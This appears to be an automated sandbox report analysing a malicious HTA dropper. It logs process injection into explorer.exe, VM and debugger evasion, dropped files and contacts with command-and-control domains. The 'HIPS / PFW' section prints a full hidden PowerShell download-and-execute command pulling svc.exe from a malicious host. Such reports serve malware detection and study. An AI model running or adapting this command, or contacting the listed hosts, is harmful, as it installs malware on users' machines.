    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\EkXH.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vgjfftuJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vgjfftuJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vgjfftu:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_8-4034
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_4-4057
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeAPI/Special instruction interceptor: Address: 7731C7BA
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeAPI/Special instruction interceptor: Address: 7731BFFA
    Source: C:\Users\user\AppData\Roaming\vgjfftuAPI/Special instruction interceptor: Address: 7731C7BA
    Source: C:\Users\user\AppData\Roaming\vgjfftuAPI/Special instruction interceptor: Address: 7731BFFA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1237Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2849Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 422Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2431Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2555Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 1579Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exe TID: 3604Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3644Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3884Thread sleep count: 422 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3892Thread sleep count: 2431 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3892Thread sleep time: -243100s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3888Thread sleep count: 263 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4000Thread sleep count: 249 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4008Thread sleep count: 146 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4004Thread sleep count: 215 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -360000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3892Thread sleep count: 2555 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3892Thread sleep time: -255500s >= -30000sJump to behavior
    Source: C:\Windows\System32\taskeng.exe TID: 3980Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h4_2_00418A70
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h8_2_00418A70
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
    Source: explorer.exe, 00000005.00000000.405739079.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
    Source: explorer.exe, 00000005.00000000.405739079.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
    Source: explorer.exe, 00000005.00000000.405739079.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
    Source: explorer.exe, 00000005.00000000.405400637.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
    Source: explorer.exe, 00000005.00000000.405739079.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_8-4034
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_4-4057
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_0022092B mov eax, dword ptr fs:[00000030h]4_2_0022092B
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00220D90 mov eax, dword ptr fs:[00000030h]4_2_00220D90
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_0066BBF4 push dword ptr fs:[00000030h]4_2_0066BBF4
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_0022092B mov eax, dword ptr fs:[00000030h]8_2_0022092B
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00220D90 mov eax, dword ptr fs:[00000030h]8_2_00220D90
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_0099B7D4 push dword ptr fs:[00000030h]8_2_0099B7D4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\explorer.exeFile created: vgjfftu.5.drJump to dropped file
    Source: C:\Windows\explorer.exeDomain query: openclehardware.ru
    Source: C:\Windows\explorer.exeDomain query: ceoconstractionstore.pl
    Source: C:\Windows\explorer.exeDomain query: unicexpertmagazine.pw
    Source: C:\Windows\explorer.exeDomain query: informcoopirationunicolceo.ru
    Source: C:\Windows\explorer.exeNetwork Connect: 185.219.7.204 80Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeThread created: C:\Windows\explorer.exe EIP: 28319F0Jump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuThread created: unknown EIP: 27019F0Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\EkXH.exe "C:\Users\user\AppData\Local\Temp\EkXH.exe" Jump to behavior
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\vgjfftu C:\Users\user\AppData\Roaming\vgjfftuJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -command "$path = $env:temp + '\ekxh.exe'; $client = new-object system.net.webclient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); start-process -filepath $path"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -command "$path = $env:temp + '\ekxh.exe'; $client = new-object system.net.webclient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); start-process -filepath $path"Jump to behavior
    Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
    Source: explorer.exe, 00000005.00000000.405126817.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
    Source: explorer.exe, 00000005.00000000.405126817.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000005.00000000.405126817.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00418A70 InterlockedCompareExchange,GetFocus,ReadConsoleA,FindAtomA,SearchPathA,SetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExW,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmW,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthW,GetBinaryType,FormatMessageA,GetLongPathNameA,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange,4_2_00418A70
    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid Accounts1
    Native API
    1
    Scripting
    1
    DLL Side-Loading
    2
    Obfuscated Files or Information
    OS Credential Dumping11
    System Time Discovery
    Remote Services1
    Archive Collected Data
    13
    Ingress Tool Transfer
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Exploitation for Client Execution
    1
    DLL Side-Loading
    312
    Process Injection
    12
    Software Packing
    LSASS Memory1
    File and Directory Discovery
    Remote Desktop Protocol1
    Email Collection
    1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Command and Scripting Interpreter
    Logon Script (Windows)Logon Script (Windows)1
    DLL Side-Loading
    Security Account Manager215
    System Information Discovery
    SMB/Windows Admin Shares1
    Clipboard Data
    4
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts2
    PowerShell
    Login HookLogin Hook11
    Masquerading
    NTDS611
    Security Software Discovery
    Distributed Component Object ModelInput Capture124
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script231
    Virtualization/Sandbox Evasion
    LSA Secrets231
    Virtualization/Sandbox Evasion
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts312
    Process Injection
    Cached Domain Credentials3
    Process Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Hidden Files and Directories
    DCSync1
    Application Window Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
    Remote System Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1524029 Sample: 3388.PDF.hta Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 7 other signatures 2->48 8 mshta.exe 10 2->8         started        11 taskeng.exe 1 2->11         started        process3 signatures4 58 Suspicious powershell command line found 8->58 60 Tries to download and execute files (via powershell) 8->60 13 powershell.exe 12 7 8->13         started        18 vgjfftu 11->18         started        process5 dnsIp6 38 unicexpertmagazine.pw 185.219.7.204, 49161, 49162, 49163 IT-KMEIT Russian Federation 13->38 40 ukr-net-filesrever.pw 13->40 30 C:\Users\user\AppData\Local\TempkXH.exe, PE32 13->30 dropped 68 Powershell drops PE file 13->68 20 EkXH.exe 13->20         started        70 Antivirus detection for dropped file 18->70 72 Multi AV Scanner detection for dropped file 18->72 74 Detected unpacking (changes PE section rights) 18->74 76 8 other signatures 18->76 file7 signatures8 process9 signatures10 50 Antivirus detection for dropped file 20->50 52 Multi AV Scanner detection for dropped file 20->52 54 Detected unpacking (changes PE section rights) 20->54 56 8 other signatures 20->56 23 explorer.exe 1 1 20->23 injected process11 dnsIp12 32 unicexpertmagazine.pw 23->32 34 openclehardware.ru 23->34 36 2 other IPs or domains 23->36 28 C:\Users\user\AppData\Roaming\vgjfftu, PE32 23->28 dropped 62 System process connects to network (likely due to code injection or exploit) 23->62 64 Benign windows process drops PE files 23->64 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->66 file13 signatures14

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


